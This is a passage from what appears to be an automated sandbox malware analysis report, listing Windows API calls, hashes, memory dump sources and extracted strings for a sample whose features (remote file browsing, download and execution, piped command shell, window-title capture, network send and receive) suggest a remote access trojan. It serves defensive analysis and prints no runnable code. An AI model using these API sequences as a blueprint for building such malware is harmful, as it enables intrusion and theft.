                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                                  • _free.LIBCMT ref: 0044F49A
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnvironmentStrings$Free_free
                                                  • String ID:
                                                  • API String ID: 2716640707-0
                                                  • Opcode ID: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                                  • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                                  • Opcode Fuzzy Hash: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                                  • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                  • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                  • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: pQG
                                                  • API String ID: 176396367-3769108836
                                                  • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                  • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: @
                                                  • API String ID: 1890195054-2766056989
                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                  APIs
                                                  • _free.LIBCMT ref: 00446227
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap$_free
                                                  • String ID:
                                                  • API String ID: 1482568997-0
                                                  • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                  • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                  • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                  • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                  • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ForegroundText
                                                  • String ID:
                                                  • API String ID: 29597999-0
                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                  • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                  • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                  • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                  • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                  • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                  • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (PG$(aF$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                  • API String ID: 1067849700-414524693
                                                  • Opcode ID: 43f527d5aa168df0e6e254b46546ae49201302b9c8fd69c8289698f44f31af86
                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                  • Opcode Fuzzy Hash: 43f527d5aa168df0e6e254b46546ae49201302b9c8fd69c8289698f44f31af86
                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
